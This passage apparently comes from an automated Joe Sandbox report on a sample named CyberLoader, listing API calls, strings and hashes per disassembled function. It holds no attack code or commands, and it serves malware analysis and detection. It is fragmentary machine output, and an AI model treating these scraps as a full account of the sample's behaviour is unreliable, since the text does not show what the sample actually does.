                                                  • Opcode Fuzzy Hash: af6f2f54c3d5c590a32917642608b6f8668c64ec44dcaa775c773a48500bf679
                                                  • Instruction Fuzzy Hash: 8B316B71A25219BFDF21DF99EC859EEBBECEF85710B144066E80497611D6708E60CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00277579
                                                    • Part of subcall function 00273B3D: __EH_prolog.LIBCMT ref: 00273B42
                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00277640
                                                    • Part of subcall function 00277BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277C04
                                                    • Part of subcall function 00277BF5: GetLastError.KERNEL32 ref: 00277C4A
                                                    • Part of subcall function 00277BF5: CloseHandle.KERNEL32(?), ref: 00277C59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                  • API String ID: 3813983858-639343689
                                                  • Opcode ID: 30319c0ec4b0c542acfdff30b6a01b7d4101a858ca66cecd320e53a733cadaea
                                                  • Instruction ID: 39707f324f4c8d31b83b74359bab74c0c542efaf3dc2c796589f189159a58b76
                                                  • Opcode Fuzzy Hash: 30319c0ec4b0c542acfdff30b6a01b7d4101a858ca66cecd320e53a733cadaea
                                                  • Instruction Fuzzy Hash: CA31E971924249AFDF11EF68DC85BFE7BBDAF15354F008055F448A7192CB704A64CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • EndDialog.USER32(?,00000001), ref: 0028A4B8
                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0028A4CD
                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0028A4E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemText$DialogWindow
                                                  • String ID: ASKNEXTVOL
                                                  • API String ID: 445417207-3402441367
                                                  • Opcode ID: 6fdb66742016cf29a15d3460b5837a3be3ce4e877c76dd61bde9e4a68fd69133
                                                  • Instruction ID: 04d640c1b148134d84663d6decf93d3fffd363933267a99979f39b1a430de974
                                                  • Opcode Fuzzy Hash: 6fdb66742016cf29a15d3460b5837a3be3ce4e877c76dd61bde9e4a68fd69133
                                                  • Instruction Fuzzy Hash: E6119636666201AFEA21AF68AC4DF6A3769EB56700F104007F245970F1CBE19D35DB22
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: __fprintf_l_strncpy
                                                  • String ID: $%s$@%s
                                                  • API String ID: 1857242416-834177443
                                                  • Opcode ID: 5d81ea3338b86a17c48423bbd7fd0337b06818ebdf626bc6b9b6dd53b01a442c
                                                  • Instruction ID: 0ad57046bbd670f81bf936921d56080f5715cb828afaa1341b14d16396f1652d
                                                  • Opcode Fuzzy Hash: 5d81ea3338b86a17c48423bbd7fd0337b06818ebdf626bc6b9b6dd53b01a442c
                                                  • Instruction Fuzzy Hash: C4218172560209ABDF21DEA4CC06FEE7BB8AF05300F048512FE1896193D771EA669F51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _swprintf.LIBCMT ref: 0027B51E
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • _wcschr.LIBVCRUNTIME ref: 0027B53C
                                                  • _wcschr.LIBVCRUNTIME ref: 0027B54C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                  • String ID: %c:\
                                                  • API String ID: 525462905-3142399695
                                                  • Opcode ID: fcb28b81d2470f7914f37ba1e565468033ec5e06c617864befd9dc7d5cb8bdcd
                                                  • Instruction ID: 9d2c1bf34a707530eec82798362a488cd081cdfdcaec0d2287c012667b2d0345
                                                  • Opcode Fuzzy Hash: fcb28b81d2470f7914f37ba1e565468033ec5e06c617864befd9dc7d5cb8bdcd
                                                  • Instruction Fuzzy Hash: 0D01FE539243137ACB32AF759C86E6BB7ACDE953607D18416F84DC6441FB30D570C6A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0027ABC5,00000008,?,00000000,?,0027CB88,?,00000000), ref: 002806F3
                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0027ABC5,00000008,?,00000000,?,0027CB88,?,00000000), ref: 002806FD
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0027ABC5,00000008,?,00000000,?,0027CB88,?,00000000), ref: 0028070D
                                                  Strings
                                                  • Thread pool initialization failed., xrefs: 00280725
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                  • String ID: Thread pool initialization failed.
                                                  • API String ID: 3340455307-2182114853
                                                  • Opcode ID: 5d1944cca502cce049d3de3e913c26135fae502d7411ba4f48fd93683a9e126d
                                                  • Instruction ID: 8ff1160ed69f69925e9b76b67012d48a12a609a09fc1a6c604a0904a243a0a90
                                                  • Opcode Fuzzy Hash: 5d1944cca502cce049d3de3e913c26135fae502d7411ba4f48fd93683a9e126d
                                                  • Instruction Fuzzy Hash: AD11E3B5511709AFC3316F65D8C8AA7FBECEB95340F10482EF1DA82240DA716990CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                  • API String ID: 0-56093855
                                                  • Opcode ID: 6f4467b4a5c20003f4b5c79795ef404dc548c18fde95ca87b74dde1f043c7c43
                                                  • Instruction ID: 27264a53a991ce176c55179145db1dcff14f69ca8fea46930e56b70e5172cacd
                                                  • Opcode Fuzzy Hash: 6f4467b4a5c20003f4b5c79795ef404dc548c18fde95ca87b74dde1f043c7c43
                                                  • Instruction Fuzzy Hash: A701D879921246AFCB12AF14FC48E567BA9E715340F044532F405D22F0DAB1DC74EF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                  • Instruction ID: 925cb17c07a451f1ab39dba772239f28b994ca85f1e1d75bad5873a41cb9f0c5
                                                  • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                  • Instruction Fuzzy Hash: A3A149719243869FEF12CF5CC8917AEBBE5EF55320F1841ADE8459B281C2349D92CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,002780B7,?,?,?), ref: 0027A351
                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,002780B7,?,?), ref: 0027A395
                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,002780B7,?,?,?,?,?,?,?,?), ref: 0027A416
                                                  • CloseHandle.KERNEL32(?,?,00000000,?,002780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0027A41D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$Create$CloseHandleTime
                                                  • String ID:
                                                  • API String ID: 2287278272-0
                                                  • Opcode ID: 60b7e1a9067053138fef7d682ae7cabad014d3b59e57e39cfc79651baad4db3c
                                                  • Instruction ID: c162876b23df455bcdfb5ec4fe9d72ec5f05f099cb1629f3af91b750730959c5
                                                  • Opcode Fuzzy Hash: 60b7e1a9067053138fef7d682ae7cabad014d3b59e57e39cfc79651baad4db3c
                                                  • Instruction Fuzzy Hash: B341DF30258382AAE731DF24DC56BAFBBE8ABC1710F04895DB5D8931C1D6749A58DB13
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002989AD,?,00000000,?,00000001,?,?,00000001,002989AD,?), ref: 0029C0E6
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0029C16F
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,002967E2,?), ref: 0029C181
                                                  • __freea.LIBCMT ref: 0029C18A
                                                    • Part of subcall function 00298518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: 26e33dc790cd3addd49bf03936e5b43b519f1b2c60b8cea88bb22daf1b1cce4b
                                                  • Instruction ID: 6a53a3992806e7b89768b97688e30b735fcccaaf1705c472d12759cdb8e6e835
                                                  • Opcode Fuzzy Hash: 26e33dc790cd3addd49bf03936e5b43b519f1b2c60b8cea88bb22daf1b1cce4b
                                                  • Instruction Fuzzy Hash: BF31EF72A2020AABDF24DF64DC45EAE7BA5EF45710F254168FC08D7291EB35CD64CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00289DBE
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00289DCD
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00289DDB
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00289DE9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: bac2c77c20dda80d277471486e98481ae95c49f8f11704ffccdc5815552e5998
                                                  • Instruction ID: 521e7d687f076cb3cdbbd2e09cf0aec051c7962243b87b19f013eba0b3f38788
                                                  • Opcode Fuzzy Hash: bac2c77c20dda80d277471486e98481ae95c49f8f11704ffccdc5815552e5998
                                                  • Instruction Fuzzy Hash: 77E0EC31D97622E7D3206FA4BC0DB9B3B68AB29713F054106F605961D4DA704849CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00292016
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0029201B
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00292020
                                                    • Part of subcall function 0029310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0029311F
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00292035
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                  • Instruction ID: 9ba1cc4dacbee3ad2f8a6be65296ca6c33a3f548ff9efa035284522e14648c59
                                                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                  • Instruction Fuzzy Hash: 1CC04824038642F41C22BEB232022BD2B440C72BD4B9270C2E88827113EE460A3EEC77
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00289DF1: GetDC.USER32(00000000), ref: 00289DF5
                                                    • Part of subcall function 00289DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00289E00
                                                    • Part of subcall function 00289DF1: ReleaseDC.USER32(00000000,00000000), ref: 00289E0B
                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00289F8D
                                                    • Part of subcall function 0028A1E5: GetDC.USER32(00000000), ref: 0028A1EE
                                                    • Part of subcall function 0028A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0028A21D
                                                    • Part of subcall function 0028A1E5: ReleaseDC.USER32(00000000,?), ref: 0028A2B5
                                                  Strings
                                                  Similarity
                                                  • API ID: ObjectRelease$CapsDevice
                                                  • String ID: (
                                                  • API String ID: 1061551593-3887548279
                                                  • Opcode ID: f74f483753b429c9a2fce2f04e98ae3b5c5b5f822e6ea4775c36b9a4ce2ca26c
                                                  • Instruction ID: b12da5eb51773ded7305919be384193cc9a000dea55ef1df22af1604652e751c
                                                  • Opcode Fuzzy Hash: f74f483753b429c9a2fce2f04e98ae3b5c5b5f822e6ea4775c36b9a4ce2ca26c
                                                  • Instruction Fuzzy Hash: 43812475618214AFD714DF28D848A2ABBE9FF89704F00491EF98AD7260CB71AD05CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _swprintf
                                                  • String ID: %ls$%s: %s
                                                  • API String ID: 589789837-2259941744
                                                  • Opcode ID: 4779cffc7d1f38f194bfdc6f653a4a59460589e3358d518f9089b02218c9752a
                                                  • Instruction ID: 613c35c864123d22cb4ca9270e1ec3ff93e49925f3ad3fdfaf9c834db1f05f09
                                                  • Opcode Fuzzy Hash: 4779cffc7d1f38f194bfdc6f653a4a59460589e3358d518f9089b02218c9752a
                                                  • Instruction Fuzzy Hash: D051E93D57E700FAFA713AA4CC83F377569AB25B01F208907B78A648D5CAE154746B12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00277730
                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002778CC
                                                    • Part of subcall function 0027A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A27A,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A458
                                                    • Part of subcall function 0027A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A27A,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A489
                                                  Strings
                                                  Similarity
                                                  • API ID: File$Attributes$H_prologTime
                                                  • String ID: :
                                                  • API String ID: 1861295151-336475711
                                                  • Opcode ID: 12c9b1d8781530a39cfbca15b5efa1da391545959446dfd16340f9608901841a
                                                  • Instruction ID: 1174070448f9cbbe4744b18f0a1ba9198939234cac5a6bc3fc28c08161f02c0a
                                                  • Opcode Fuzzy Hash: 12c9b1d8781530a39cfbca15b5efa1da391545959446dfd16340f9608901841a
                                                  • Instruction Fuzzy Hash: 5A419471815228AADB24EB50CD55EEEB37CAF45300F00C1DAB60DA3092EB745FA4DF62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UNC$\\?\
                                                  • API String ID: 0-253988292
                                                  • Opcode ID: abfefe7ee19cd63356d03dd184f061d7575eb3be6aa076a6662f2ab0a6840db0
                                                  • Instruction ID: 98dddf62a88072da84980c048ffd0970b5c1877a62c5fa5504a137abd1234fc3
                                                  • Opcode Fuzzy Hash: abfefe7ee19cd63356d03dd184f061d7575eb3be6aa076a6662f2ab0a6840db0
                                                  • Instruction Fuzzy Hash: D341943682021AABCF22AF21DC45FEFB7A9AF46750B10C065F81C97152DB70DA71CE60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Shell.Explorer$about:blank
                                                  • API String ID: 0-874089819
                                                  • Opcode ID: db05f38a236e65c092ab0955a93b81bbe899a9f3f081b01996b73907b4facfe4
                                                  • Instruction ID: f6418670cc93308589fdaf585698290d5bea3e09d7738462955f1a2538c58a09
                                                  • Opcode Fuzzy Hash: db05f38a236e65c092ab0955a93b81bbe899a9f3f081b01996b73907b4facfe4
                                                  • Instruction Fuzzy Hash: B8216F752252059FCB08EF64D895A3A77A8FF89711B18856DF9099B2C2DF70EC50CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DialogBoxParamW.USER32(GETPASSWORD1,00010464,0028A990,?,?), ref: 0028D4C5
                                                  Strings
                                                  Similarity
                                                  • API ID: DialogParam
                                                  • String ID: GETPASSWORD1$xj,
                                                  • API String ID: 665744214-1809890633
                                                  • Opcode ID: dae130319eebc69f333c417e676e9c27a25d11f081864483171eb31fab50b18b
                                                  • Instruction ID: b55cbabe63b9969c55efe5d3b7d4cad592ef982514682e1a158f74eb9c94ebe3
                                                  • Opcode Fuzzy Hash: dae130319eebc69f333c417e676e9c27a25d11f081864483171eb31fab50b18b
                                                  • Instruction Fuzzy Hash: 86119E71630248ABDF22EE34AC06BEB33A8B70A351F144175FD09A71D1CAB0AC64C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0027EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0027EB92
                                                    • Part of subcall function 0027EB73: GetProcAddress.KERNEL32(002B81C0,CryptUnprotectMemory), ref: 0027EBA2
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,0027EBEC), ref: 0027EC84
                                                  Strings
                                                  • CryptProtectMemory failed, xrefs: 0027EC3B
                                                  • CryptUnprotectMemory failed, xrefs: 0027EC7C
                                                  Similarity
                                                  • API ID: AddressProc$CurrentProcess
                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                  • API String ID: 2190909847-396321323
                                                  • Opcode ID: 7585c9831b6ddbae0068576de6838a76c0ab4ca082837d84e07989dedb933d8b
                                                  • Instruction ID: bf98078fdee4fa390a58e27366072a651b19b8cf6545c3b8c42ac056175ce08c
                                                  • Opcode Fuzzy Hash: 7585c9831b6ddbae0068576de6838a76c0ab4ca082837d84e07989dedb933d8b
                                                  • Instruction Fuzzy Hash: 3D113A35A316256BDF169F24DD0AAAE3718EF09710B05C19EFC0D5F281CB719D618BE4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: X*
                                                  • API String ID: 269201875-76513911
                                                  • Opcode ID: 6b9ce70a62a6e87625f1cdfd92b309df262751e9d952e631cc3bc99384026916
                                                  • Instruction ID: fdc4ec64d859f627df846a0cac004ac024ca9541d41dab6c5ec00aefbe65c571
                                                  • Opcode Fuzzy Hash: 6b9ce70a62a6e87625f1cdfd92b309df262751e9d952e631cc3bc99384026916
                                                  • Instruction Fuzzy Hash: CB11D671E222226BEF209F3CBC49B1633956F55734F05062BF921CA5D0E775DCB28A80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0028F25E
                                                  • ___raise_securityfailure.LIBCMT ref: 0028F345
                                                  Strings
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                  • String ID: 8-
                                                  • API String ID: 3761405300-625495810
                                                  • Opcode ID: 016013b7b769aef8611074ae48aab00d2a94e3c44280c77b364740c2ffa4a2f8
                                                  • Instruction ID: 5f1029f5833f03bc67e8f9d7994642335fbdafa259eb16a6e47e6f67e7ff39a0
                                                  • Opcode Fuzzy Hash: 016013b7b769aef8611074ae48aab00d2a94e3c44280c77b364740c2ffa4a2f8
                                                  • Instruction Fuzzy Hash: 772100B99222048BD754EF64F9C9B047BA5FB4D310F20582BE9088B3B0E3B0AD91CF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateThread.KERNEL32 ref: 002808AD
                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 002808F4
                                                    • Part of subcall function 00276E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00276EAF
                                                  Strings
                                                  Similarity
                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                  • String ID: CreateThread failed
                                                  • API String ID: 2655393344-3849766595
                                                  • Opcode ID: 9d9311ef98ae32791b8610bd1d212cc705ab7bbafb7bffc1fc99833d5f4aa779
                                                  • Instruction ID: c56e6fb6367a95310ccaf618066ee8bda8888eabd0b346a05e94f9ee295994eb
                                                  • Opcode Fuzzy Hash: 9d9311ef98ae32791b8610bd1d212cc705ab7bbafb7bffc1fc99833d5f4aa779
                                                  • Instruction Fuzzy Hash: 9101D6B93653066FE630BF54ECC6FAA7398EB41751F10002DF98A521C1CEB1A8A49B64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00298FA5: GetLastError.KERNEL32(?,002B0EE8,00293E14,002B0EE8,?,?,00293713,00000050,?,002B0EE8,00000200), ref: 00298FA9
                                                    • Part of subcall function 00298FA5: _free.LIBCMT ref: 00298FDC
                                                    • Part of subcall function 00298FA5: SetLastError.KERNEL32(00000000,?,002B0EE8,00000200), ref: 0029901D
                                                    • Part of subcall function 00298FA5: _abort.LIBCMT ref: 00299023
                                                  • _abort.LIBCMT ref: 0029B2E0
                                                  • _free.LIBCMT ref: 0029B314
                                                  Strings
                                                  Similarity
                                                  • API ID: ErrorLast_abort_free
                                                  • String ID: *
                                                  • API String ID: 289325740-3442289017
                                                  • Opcode ID: ee2ab5be65776dbf3483f126632499af8dd8d7b72e99f0fc5f7daaf63d37caec
                                                  • Instruction ID: 4a6c2de45fe7aaae52bcf04e46d18f7c914d036989f600a298d2dc3329abb1f4
                                                  • Opcode Fuzzy Hash: ee2ab5be65776dbf3483f126632499af8dd8d7b72e99f0fc5f7daaf63d37caec
                                                  • Instruction Fuzzy Hash: 20019635D31A26DFCF26EF59A90125DB364FF05721B1A054AE82467681CF306D62CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0027DA98: _swprintf.LIBCMT ref: 0027DABE
                                                    • Part of subcall function 0027DA98: _strlen.LIBCMT ref: 0027DADF
                                                    • Part of subcall function 0027DA98: SetDlgItemTextW.USER32(?,002AE154,?), ref: 0027DB3F
                                                    • Part of subcall function 0027DA98: GetWindowRect.USER32(?,?), ref: 0027DB79
                                                    • Part of subcall function 0027DA98: GetClientRect.USER32(?,?), ref: 0027DB85
                                                  • GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                  • SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                  • String ID: 0
                                                  • API String ID: 2622349952-4108050209
                                                  • Opcode ID: dec7590dd7c7b5e3510fdd9c347d3f42368381b5f7a650db643d173c4c509f79
                                                  • Instruction ID: 263f753a0dd60b97906706ac830f811240c2741a566cbe08f950149b317c05eb
                                                  • Opcode Fuzzy Hash: dec7590dd7c7b5e3510fdd9c347d3f42368381b5f7a650db643d173c4c509f79
                                                  • Instruction Fuzzy Hash: 04F0FF3042024EA7CF260F288C4DBEA3BA8BF21745F08C084FD5D404A1C774C8B5EB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00280A78,?), ref: 00280854
                                                  • GetLastError.KERNEL32(?), ref: 00280860
                                                    • Part of subcall function 00276E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00276EAF
                                                  Strings
                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00280869
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                  • API String ID: 1091760877-2248577382
                                                  • Opcode ID: 3ea9a6c1a8a5f8ad01f006a8e0606c4bf53f6b9c3a14fc57e7d43c5dbbe7fe14
                                                  • Instruction ID: 209c970add33f01e89c2051a13ccd8b3f40402fc452cdc08a5b47796286f7ba8
                                                  • Opcode Fuzzy Hash: 3ea9a6c1a8a5f8ad01f006a8e0606c4bf53f6b9c3a14fc57e7d43c5dbbe7fe14
                                                  • Instruction Fuzzy Hash: AFD05E35A285212BCA113724AC0EEEF79059F53770F204714F63D651F5DF3149B18AE6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,0027D32F,?), ref: 0027DA53
                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0027D32F,?), ref: 0027DA61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmp
